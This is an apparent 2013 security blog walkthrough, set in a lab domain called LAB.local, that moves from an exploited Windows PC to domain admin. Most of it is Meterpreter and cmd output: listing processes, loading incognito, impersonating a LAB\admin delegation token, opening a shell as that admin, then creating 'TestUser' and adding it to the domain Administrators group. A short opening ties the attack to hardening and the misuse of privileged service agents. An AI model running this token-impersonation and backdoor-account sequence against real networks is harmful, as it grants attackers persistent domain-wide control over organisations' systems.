Create a domain user admin through an exploited PC

Peru — Tue, 07 May 2013 17:35:10 +0000

The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
1736 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
1788 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1812 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1856 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1868 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
2032 ibmpmsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ibmpmsvc.exe
176 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
312 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
404 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
508 EvtEng.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
604 S24EvMon.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
824 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
848 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1228 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1304 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1344 AcPrfMgrSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
1416 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
1484 RegSrvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
1676 TpKmpSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\TpKmpSVC.exe
180 AcSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
700 MOMService.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
224 wmiprvse.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\wbem\wmiprvse.exe
948 SvcGuiHlpr.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
2580 alg.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\System32\alg.exe
3276 explorer.exe x86 0 LAB\utente1 C:\WINDOWS\Explorer.EXE
3908 tp4mon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\tp4mon.exe
1112 igfxtray.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxtray.exe
1124 hkcmd.exe x86 0 LAB\utente1 C:\WINDOWS\system32\hkcmd.exe
2192 igfxpers.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxpers.exe
1860 ACTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
2596 ACWLIcon.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
2700 smax4pnp.exe x86 0 LAB\utente1 C:\Programmi\Analog Devices\Core\smax4pnp.exe
2904 ctfmon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\ctfmon.exe
3076 BTTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
3572 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
2912 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
1472 rundll32.exe x86 0 LAB\admin C:\WINDOWS\system32\rundll32.exe <---------- Look at these
1256 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
3044 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3224 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”

Impersonate token – GoSecure!

Create a domain user admin through an exploited PC